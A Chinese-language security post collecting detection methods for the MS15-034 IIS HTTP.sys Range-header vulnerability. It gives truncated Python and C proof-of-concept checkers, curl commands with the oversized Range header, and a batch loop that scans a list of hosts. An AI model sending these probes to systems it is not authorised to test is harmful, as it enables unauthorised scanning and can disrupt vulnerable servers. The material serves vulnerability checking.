检测脚本一:
Python—-beebeeto
http://www.beebeeto.com/pdb/poc-2015-0081/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 | #!/usr/bin/env python # coding=utf-8 """ Site: http://www.beebeeto.com/ Framework: https://github.com/n0tr00t/Beebeeto-framework """ import socket import random import urlparse from baseframe import BaseFrame class MyPoc(BaseFrame): @classmethod |
检测脚本二:
http://www.exploit-db.com/exploits/36773/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 | /* UNTESTED – MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca sbb ecx,edx 8a8b211b 51 push ecx 8a8b211c 50 push eax 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4 BY: john.b.hale@gmai.com Twitter: @rhcp011235 */ #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <arpa/inet.h> int connect_to_server(char *ip) { int sockfd = 0, n = 0; struct sockaddr_in serv_addr; struct hostent *server; if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("/n Error : Could not create socket /n"); return 1; } memset(&serv_addr, ‘0’, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(80); if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0) { printf("/n inet_pton error occured/n"); return 1; } if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) { printf("/n Error : Connect Failed /n"); return 1; } return sockfd; } int main(int argc, char *argv[]) if(argc != 2) |
检测方法三:
最简单的检测方法:
1 | curl -i http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" |
包含 The requested range is not satisfiable 就表示有漏洞
1 | curl http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable" |
批量代码:
1 2 3 4 5 6 7 | [cce] setlocal enabledelayedexpansion for /f %%i in (iisf.txt) do ( curl –i %%i –H “Host: irrelevant” –H “Range: bytes=0-18446744073709551615” | find “The requested range is not satisfiable” ) pause [/cce] |
扫“安全盒子”二维码,获取最新互联网资讯!